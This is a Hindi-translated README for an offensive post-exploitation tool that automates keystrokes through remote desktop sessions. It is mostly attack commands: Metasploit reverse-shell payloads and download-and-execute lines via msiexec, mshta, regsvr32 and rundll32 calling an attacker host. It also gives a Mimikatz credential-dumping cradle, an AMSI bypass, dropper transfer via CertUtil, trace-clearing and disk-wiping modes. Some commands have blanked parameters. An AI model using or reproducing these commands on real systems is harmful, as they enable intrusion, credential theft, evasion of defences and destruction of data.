
एक स्क्रिप्ट जो ग्राफिकल डेस्कटॉप प्रोग्राम के माध्यम से कीस्ट्रोक्स को स्वचालित करती है।
एक स्क्रिप्ट जो सक्रिय रिमोट डेस्कटॉप सत्र के माध्यम से कीस्ट्रोक्स को स्वचालित करती है, जो आक्रामक ऑपरेटरों को लिविंग ऑफ द लैंड तकनीकों के साथ संयोजन में सहायता करती है। सभी श्रेय nopernik को जाता है जिन्होंने इसे संभव बनाया, इसलिए मैंने इसे बेहतर बनाने का बीड़ा उठाया। मैं कुछ ऐसा चाहता था जो पोस्ट-एक्सप्लॉइटेशन चरण में रिमोट डेस्कटॉप के माध्यम से कमांड निष्पादित करते समय सहायता करे। संसाधनों को व्यवस्थित तरीके से एकत्र करने के लिए SCPA प्रोजेक्ट बनाना भी संभव था।
अपने पैकेज मैनेजर के अनुसार शेष निर्भरताएँ स्थापित करें।``` $ sudo apt install -y xfreerdp-x11 remmina xdotool
$ sudo dnf install -y xdotool freerdp-2 remmina
$ sudo pacman -S freerdp remmina xdotool
$ sudo emerge xwayland freerdp remmina xdotool
$ sudo nix-env -iA nixpkgs.xwayland nixpkgs.xdotool nixpkgs.freerdp nixpkgs.remmina
### सेटअप
सिस्टम में प्रोग्राम इंस्टॉल करें और `rks` को `remotekeystrokes` का एक सिम्बॉलिक लिंक बनाएं। इसका उपयोग कमांड उपनाम के रूप में किया जाएगा।```
$ sudo wget -O /usr/local/src/remotekeystrokes.sh https://raw.githubusercontent.com/U53RW4R3/RemoteKeyStrokes/main/remotekeystrokes.sh && \
sudo ln -sf /usr/local/src/remotekeystrokes.sh /usr/local/bin/remotekeystrokes && \
sudo ln -sf /usr/local/src/remotekeystrokes.sh /usr/local/bin/rks && \
sudo chmod 755 /usr/local/src/remotekeystrokes.sh /usr/local/bin/remotekeystrokes /usr/local/bin/rks
$ remotekeystrokes -h Usage: remotekeystrokes
Flags:
COMMON OPTIONS: -c, --command <command | file> Specify a command or a file contains commands to execute
-p, --platform <operating_system> Specify the operating system ("windows" is
set by default if not specified)
-w, --windowname <window_name> Specify the window name to focus on the
active window ("freerdp" is set by default
if not specified)
-h, --help Display this help message
UPLOAD FILES: -i, --input <input_file> Specify the local input file to transfer -o, --output <output_file> Specify the remote output file to transfer
METHODS: -m, --method Specify a method. For command execution method "none" is set by default if not specified. For file transfer "pwshb64" is set by default if not specified. Other available methods are: "elevate", "persistence", "antiforensics", and "mayhem"
-s, --submethod <submethod> Specify a submethod from a method (applies
with -m flag)
-a, --action <action> Specify an action from a method and/or
submethod (applies with -m and/or -s flag)
-e, --evasion <evasion> Specify an evasion method for uploading files
(only works for "pwshb64")
## उपयोग
### 0x00 - दूरस्थ प्रमाणीकरण
#### प्रतीक
- डॉलर चिह्न (`$`) एक unix शेल प्रॉम्प्ट को इंगित करता है जिसमें सामान्य उपयोगकर्ता विशेषाधिकार होते हैं, और इसमें कमांड शामिल होते हैं।
- कोण कोष्ठक (`<>`) का अर्थ अनिवार्य पैरामीटर है।
- वर्ग कोष्ठक (`[]`) का अर्थ वैकल्पिक पैरामीटर है, यदि निर्दिष्ट करना आवश्यक न हो।
#### RDP
आधुनिक ऑपरेटिंग सिस्टम को प्रमाणित करने के लिए, या तो TLS `/sec:tls` के रूप में प्रमाणीकरण को बाध्य करने के लिए फ़्लैग निर्दिष्ट करें या NLA `/sec:nla` के रूप में प्रमाणीकरण।```
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>]
पुराने ऑपरेटिंग सिस्टम को प्रमाणित करने के लिए फ़्लैग /sec:rdp निर्दिष्ट करें ताकि पुरानी प्रमाणीकरण बाध्य हो।```
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:rdp [/d:"<domain_name>"] /u:"" /p:"" /v::[]
#### VNC
VNC मशीन को दूरस्थ रूप से प्रमाणित करने के लिए।```
$ remmina -c vnc://<username>:<password>@<IP>
$ ssh [-p ] @
#### Telnet```
$ telnet <IP> [PORT]
प्रमाणित रिमोट सत्र के साथ विंडोज टार्गेट पर कमांड निष्पादित करने के लिए remotekeystrokes (या एक उपनाम कमांड rks) का उपयोग करने के लिए। उन्हें निष्पादित करने से पहले आपको एक विंडो नाम (-w) के साथ नेविगेट करना होगा, डिफ़ॉल्ट रूप से xfreerdp का उपयोग करते समय यह FreeRDP खोजेगा। भिन्न रिमोट लॉगिन प्रोग्राम वाले सिस्टम को लक्षित करते समय विंडो नाम निर्दिष्ट करना सुनिश्चित करें। कमांड जारी करने के लिए -c फ्लैग निर्दिष्ट करें। आप कमांड डालने के लिए एक टेक्स्ट फ़ाइल भी तैयार कर सकते हैं और यह उन्हें एक-एक करके पढ़ेगा। फ्लैग जांचेगा कि यह एक स्ट्रिंग है या फ़ाइल।
ग्राफिकल रिमोट डेस्कटॉप प्रोग्राम जैसे FreeRDP, Remmina, और अन्य तृतीय-पक्ष प्रोग्राम के लिए। telnet और ssh जैसे रिमोट टर्मिनल सत्रों के विपरीत। आपको टार्गेट मशीन के अंदर एक सक्रिय एप्लिकेशन पर कर्सर नेविगेट करना होगा। उदाहरण के लिए, विंडोज वातावरण में आपको एक कमांड प्रॉम्प्ट (cmd.exe) या पावरशेल (powershell.exe) खोलना होगा। विंडोज के लिए त्वरित लॉन्च के लिए डायलॉग बॉक्स (-m dialogbox) के साथ प्रोग्राम खोलना संभव है। जब आपने शुरू में इस विधि से निष्पादित किया था तो रजिस्ट्री प्रविष्टि से निशान साफ़ करना सुनिश्चित करें। यह HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU में स्थित है। आप उदाहरण देखेंगे कि आप केवल Living off the Land (LotL) तकनीकों के साथ त्वरित आक्रामक उपाय कैसे कर सकते हैं।
स्थानीय मशीन की गणना।``` $ cat recon_local_enum_cmds.txt whoami /all net user net localgroup Administrators ipconfig /all systeminfo
$ rks -c "cmd.exe" -m dialogbox [] Checking one of the lines reaches 260 character limit [] Executing commands... [+] Task completed!
$ rks -c recon_local_enum_cmds.txt [*] Executing commands... [+] Task completed!
एक आदेश में निष्पादित करने के लिए। यह विशेष रूप से तब संक्षिप्त होता है जब एक डायलॉग बॉक्स के साथ उपयोग किया जाता है।```
$ rks -c "cmd.exe /k \"whoami /all & net user & net localgroup Administrators & ipconfig /all & systeminfo\"" -m dialogbox
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!
एक्टिव डायरेक्टरी गणना.``` $ cat recon_ad_enum_cmds.txt net user /domain net group "Domain Admins" /domain net group "Enterprise Admins" /domain net group "Domain Computers" /domain
$ rks -c "cmd.exe" -m dialogbox [] Checking one of the lines reaches 260 character limit [] Executing commands... [+] Task completed!
$ rks -c recon_ad_enum_cmds.txt [*] Executing commands... [+] Task completed!
एकल कमांड में निष्पादित करने के लिए। यह विशेष रूप से एक डायलॉग बॉक्स के साथ उपयोग करने पर संक्षिप्त है।```
$ rks -c "cmd.exe /k \"net user /domain & net group \"Domain Admins\" /domain & net group \"Enterprise Admins\" /domain & net group \"Domain Computers\" /domain\""
[*] Checking one of the lines reaches 260 character limit
[*] Executing commands...
[+] Task completed!
स्थानीय मशीन गणना (TODO)``` $ cat recon_local_enum_cmdlets.txt
$ rks -c "powershell.exe" -m dialogbox
$ rks -c recon_local_enum_cmdlets.txt
सक्रिय निर्देशिका गणना (TODO)```
$ cat recon_ad_enum_cmdlets.txt
$ rks -c "powershell.exe" -m dialogbox
$ rks -c recon_ad_enum_cmdlets.txt
पावरशेल की सामग्री पढ़ते हुए पेलोड निष्पादित करें।``` $ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport= -f psh -o payload.ps1
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport ; run"
$ rks -c "powershell.exe" -m dialogbox
$ rks -c payload.ps1
एक powershell oneliner पेलोड को `metasploit-framework` एक्सप्लॉइट मॉड्यूल `exploit/multi/script/web_delivery` का उपयोग करके निष्पादित करें।```
$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath payload; run"
$ rks -c "cmd.exe" -m dialogbox
$ rks -c "powershell.exe -nop -w hidden -e <base64_payload>"
पेलोड को msiexec.exe के साथ निष्पादित करें जबकि एक वेबसर्वर होस्ट कर रहे हों।```
$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport= -f msi -o payload.msi
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport ; run"
$ sudo python -m http.server 80
$ rks -c "msiexec /quiet /qn /i http://<attacker_IP>/payload.msi" -m dialogbox
पेलोड को `mshta.exe` के साथ चलाएं, `metasploit-framework` के शोषण मॉड्यूल `exploit/windows/misc/hta_server` का उपयोग करके।```
$ sudo msfconsole -qx "use exploit/windows/misc/hta_server; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvhost <server_IP>; set srvport <server_PORT> run"
$ rks -c "mshta.exe http://<attacker_IP>:<attacker_PORT>/payload.hta" -m dialogbox
रन्डीएल३२.एक्सई के साथ पेलोड निष्पादित करें, metasploit-framework के exploit/windows/smb/smb_delivery एक्सप्लॉइट मॉड्यूल का उपयोग करते हुए।```
$ sudo msfconsole -qx "use exploit/windows/smb/smb_delivery; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport 8443; set srvhost <server_IP>; set file_name payload.dll; set share staging; run"
$ rks -c "rundll32.exe \<attacker_IP>\staging\payload.dll,0" -m dialogbox
पेलोड को `regsvr32.exe` के साथ निष्पादित करें `metasploit-framework` का उपयोग करके शोषण मॉड्यूल `exploit/multi/script/web_delivery`।```
$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 3; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath payload; run"
$ rks -c "regsvr32 /s /n /u /i://http://<attacker_IP>:<attacker_PORT>/payload.sct scrobj.dll" -m dialogbox
निष्पादित करें और इम्प्लांट करें python का उपयोग करके metasploit-framework के एक्सप्लॉइट मॉड्यूल exploit/multi/script/web_delivery के साथ।```
$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 0; set payload python/meterpreter/reverse_tcp; set lhost ; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath payload; run"
$ rks -c "python -c """
### 0x03 - फ़ाइल स्थानांतरण
कुल 11 फ़ाइल स्थानांतरण विधियाँ हैं।
| Method | Platform | विवरण |
| -------------- | ----------------- | ----------- |
| `pwshb64` | Windows and Linux | फ़ाइल को base64 में एनकोड करता है और फिर powershell के साथ डीकोड करता है। |
| `cmdb64` | Windows | एनकोडेड base64 फ़ाइल की सामग्री को आउटपुट करने के लिए `copy con` का उपयोग करता है, फिर इसे `CertUtil.exe` के साथ डीकोड करता है। |
| `nixb64` | Unix | base64 सामग्री को एक फ़ाइल में डीकोड करता है। |
| `outfile` | Windows and Linux | टेक्स्ट फ़ाइल को आउटपुट करने के लिए `Out-File` cmdlet का उपयोग करता है। |
| `outfileb64` | Windows | एनकोडेड base64 फ़ाइल की सामग्री को आउटपुट करने के लिए `Out-File` cmdlet का उपयोग करता है, फिर इसे `CertUtil.exe` के साथ डीकोड करता है। |
| `copycon` | Windows | टेक्स्ट फ़ाइल को आउटपुट करने के लिए `copy con` कमांड का उपयोग करता है। |
| `pwshhex` | Windows and Linux | फ़ाइल को हेक्साडेसिमल में एनकोड करता है और फिर powershell के साथ डीकोड करता है। |
| `cmdhex` | Windows | एक वेरिएबल में हेक्स एनकोडेड वन-लाइनर आउटपुट करता है, फिर इसे `CertUtil.exe` के साथ डीकोड करता है। |
| `copyconhex` | Windows | एनकोडेड हेक्सडंप फ़ाइल की सामग्री को आउटपुट करने के लिए `copy con` का उपयोग करता है, फिर इसे `CertUtil.exe` के साथ डीकोड करता है। |
| `nixhex` | Unix | एक वेरिएबल में हेक्स एनकोडेड वन-लाइनर आउटपुट करता है, फिर `\x` अनुक्रम वर्ण की व्याख्या करने के लिए `echo -e` के साथ डीकोड करता है। यह IoT उपकरणों के साथ व्यवहार करते समय उपयुक्त है, विशेषकर जब Telnet में फ़ाइल स्थानांतरण की सुविधा का अभाव हो।|
| `outfilehex` | Windows | एनकोडेड हेक्सडंप फ़ाइल की सामग्री को आउटपुट करने के लिए `Out-File` cmdlet का उपयोग करता है, फिर इसे `CertUtil.exe` के साथ डीकोड करता है। |
एक अलग नेटवर्क में पिवोट करते समय दूरस्थ रूप से फ़ाइल अपलोड करें। यदि आप Windows पर दूरस्थ पथ निर्दिष्ट करना चाहते हैं तो कोट्स शामिल करना सुनिश्चित करें। डिफ़ॉल्ट रूप से यदि निर्दिष्ट नहीं किया गया है तो यह फ़ाइलों को स्थानांतरित करने के लिए Powershell base64 का उपयोग करता है। इसमें ड्रॉपर भी शामिल हैं, भले ही आकार बड़ा हो। ध्यान रखें कि फ़ाइल स्थानांतरण पूरा होने में समय लगेगा।```
$ rks -c "powershell.exe" -m dialogbox
$ rks -i Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m pwshb64
[*] Transferring file...
[+] File transferred!
To transfer droppers you can use CertUtil.exe base64 especially if it's large.```
$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= lport=8443 -f exe -o payload.exe
ड्रॉपर्स को powershell के माध्यम से `CertUtil.exe` base64 के साथ स्थानांतरित करने के लिए।```
$ rks -c "powershell.exe" -m dialogbox
$ rks -i payload.exe -o payload.exe -m outfileb64
पुराने ऑपरेटिंग सिस्टमों के लिए भी फ़ाइलें स्थानांतरित करना संभव है, जैसे Windows XP जिसमें कमांड प्रॉम्प्ट को छोड़कर पॉवरशेल नहीं है।``` $ rks -c "cmd.exe" -m dialogbox
$ rks -i payload.exe -o payload.exe -m cmdb64
अपने C2 लिसनर को सक्रिय करें और पेलोड को निष्पादित करें।```
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp set lhost <IP>; set lport 8443; run"
$ rks -c ".\payload.exe"
फ़ाइलों को स्थानांतरित करने का एक और तरीका, विशेष रूप से sysadmin और आक्रामक उपकरणों के लिए। आइए PsExec64.exe को एक उदाहरण के रूप में लें, जो हमें पार्श्व गति के लिए आवश्यक है। बिना रुकावट के टेक्स्ट के माध्यम से अपलोड करने में बहुत समय लगेगा। इसके बजाय सबसे तेज़ तरीका है कि WebDAV को माउंट किया जाए जो sysinternals सूट टूलकिट (live.sysinternals.com) की वैध वेबसाइट से संबंधित है। फ़ाइल एक्सप्लोरर का उपयोग करने के बजाय, जो कमांड निष्पादित करने की तुलना में बहुत धीमा है। यहाँ कमांड प्रॉम्प्ट के लिए कमांड दिए गए हैं।```
$ cat commands.txt
net use z: \live.sysinternals.com\tools
copy z:\PsExec64.exe .
net use z: /delete
$ rks -c "cmd.exe" -m dialogbox
$ rks -c commands.txt
यहाँ विंडोज़ में `PsExec64.exe` स्थानांतरित करते समय powershell cmdlets के लिए एक और प्रकार है।```
$ cat cmdlets.txt
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\live.sysinternals.com\tools"
Copy-Item z:\PsExec64.exe .
Remove-PSDrive -Name Z
$ rks -c "powershell.exe" -m dialogbox
$ rks -c cmdlets.txt
पॉवरशेल के माध्यम से फ़ाइललेस मैलवेयर या आक्रामक उपकरणों को पुनर्प्राप्त करने का सबसे अच्छा तरीका केवल वैध वेबसाइटों जैसे https://github.com को होस्ट/प्राप्त करना और उसे निष्पादित करना है। आइए nishang से क्रैडल को डाउनलोड और निष्पादित करते हुए क्रेडेंशियल्स को पुनर्प्राप्त करने के लिए Invoke-Mimikatz का उपयोग करें।```
$ cat hashdump.txt
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds
$ rks -c "powershell.exe" -m dialogbox
$ rks -c hashdump.txt
यदि आपके पास बड़ी फाइलें हैं जिनके फ़ाइल ट्रांसफर पूरा होने का इंतजार करना लगभग असंभव है। `xfreerdp` `/drive:/path/to/directory/` फ़्लैग के साथ स्थानीय निर्देशिका को माउंट करने की अनुमति देता है। फिर फ़ाइल ब्राउज़र या शेल प्रॉम्प्ट में `\\tsclient\<share_name>\` पर नेविगेट करके सामग्री देखें।```
$ mkdir Tools
$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe Tools/
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | rdp | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>] /drive:Tools
$ rks -c "cmd.exe" -m dialogbox
$ rks -c "dir \\tsclient\<share_name>\"
नोट: WIP (कार्य प्रगति पर)``` $ rks -m elevate -s bypassuac -a info
$ rks -m elevate -s <sub_method>
### 0x05 - दृढ़ता
नोट: WIP (कार्य प्रगति पर है)```
$ rks -m persistence -s createuser
$ rks -m persistence -s sethc
नोट: WIP (कार्य प्रगति पर है)
आप AMSI Bypass को पावरशेल इम्प्लांट के साथ जोड़कर विंडोज सुरक्षा या AMSI स्कैनर के साथ एकीकृत किसी भी सुरक्षा समाधान को दरकिनार कर सकते हैं।``` $ cat amsi_bypass.ps1 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
$ cat amsi_bypass.ps1 implant.ps1 > payload.ps1
$ rks -c "powershell.exe" -m dialogbox
$ rks -c payload.ps1
कृपया अनुवाद के लिए मार्कडाउन सामग्री प्रदान करें।```
$ rks -m antiforensics -s wevutils
$ rks -m antiforensics -s winevent
$ rks -m antiforensics -s eventvwr
नोट: WIP (कार्य प्रगति पर)``` $ rks -m mayhem -s diskpart -a info
$ rks -m mayhem -s diskpart -a cmd
$ rks -m mayhem -s diskpart -a pwsh
### 0x08 - विंडो का नाम निर्दिष्ट करें।
यदि आप VNC, Telnet, या अन्य नेटवर्क प्रोटोकॉल को लक्षित कर रहे हैं तो आप विंडो का नाम निर्दिष्ट कर सकते हैं। यह उपयोगी है जब भी आप `remmina` या नाम बदली हुई विंडो वाले किसी अन्य टर्मिनल इंस्टेंस का उपयोग कर रहे हों।```
$ rks -c implant.ps1 -w <window_name>
जब मैं मैन्युअल रूप से अपने कीबोर्ड से टाइप करता हूं या अपने माउस से नेविगेट और क्लिक करता हूं, खासकर स्थानीय नेटवर्क के बाहर, तो यह बेहद धीमा होता है। मैं सिर्फ प्रक्रिया को गति देना चाहता हूं, खासकर नेटवर्क में घुसपैठ करते समय।
ज़रूरी नहीं। मैंने इसे Telnet जैसे रिमोट कंसोल के लिए भी संभव बनाया है, क्योंकि इसमें फ़ाइल स्थानांतरित करने की सुविधा का अभाव है।
तकनीकें सामान्य हैं और BadUSB, मैलवेयर डेवलपमेंट, या किसी अन्य संबंधित परियोजनाओं के लिए पुन: उपयोग की जा सकती हैं। यह GNU GPLv3 के कॉपीलेफ्ट लाइसेंस के अंतर्गत है जो आपको एक उपयोगकर्ता के रूप में यह अधिकार देता है कि आप देख सकें कि प्रोग्राम कैसे संचालित होता है, स्रोत कोड को अपनी आवश्यकताओं के अनुसार बदल सकें, और स्रोत कोड के साथ इसे अन्य उपयोगकर्ताओं को पुनर्वितरित कर सकें।
wayland डिस्प्ले सर्वर के लिए उपलब्ध है?फिलहाल xdotool का कोई विकल्प या प्रतिस्थापन खोजने के लिए कोई संगत waylands उपकरण नहीं है। dotool बहुत आशाजनक है, लेकिन इसमें विंडो पर फ़ोकस करने की एक विशिष्ट सुविधा का अभाव है। kdotool केवल KDE डेस्कटॉप वातावरण के लिए उपलब्ध है। मुझे इसे Go (चूंकि dotool मौजूद है) या pynput लाइब्रेरी के साथ Python में फिर से तैयार करना पड़ सकता है।
जब आप पहली बार प्रोग्राम चलाते हैं, तो उसे कुछ स्व-व्याख्यात्मक संदेश प्रदर्शित करने चाहिए। x11 विंडो सर्वर पर स्विच करें। wayland समर्थित क्यों नहीं है, इसके लिए FAQ देखें।```
$ rks -c "powershell.exe" -m searchbox
[ERROR] Wayland isn't supported!
[*] Terminating program...
### आक्रामक टूल को हटाएं
इसे हटाने के लिए।```
$ sudo rm -f /usr/local/bin/remotekeystrokes /usr/local/bin/rks
AES256 एन्क्रिप्शन विधि को base64 के माध्यम से लागू करें
शेष अपलोड विधियों को लागू करें: Base32, Base2, Base10, Base8
विंडोज और लिनक्स दोनों के लिए privesc फ़ंक्शन लागू करें
विंडोज और लिनक्स दोनों के लिए एक पर्सिस्टेंस फ़ंक्शन लागू करें।
विंडोज और लिनक्स दोनों के लिए एंटीफॉरेंसिक्स फ़ंक्शन लागू करें।
विंडोज और लिनक्स दोनों के लिए मेयेहम फ़ंक्शन लागू करें।
यह आपकी जिम्मेदारी है, उपयोगकर्ता, आपके कार्यों के कारण के अनुसार। याद रखें कि महान शक्ति के साथ महान जिम्मेदारी आती है।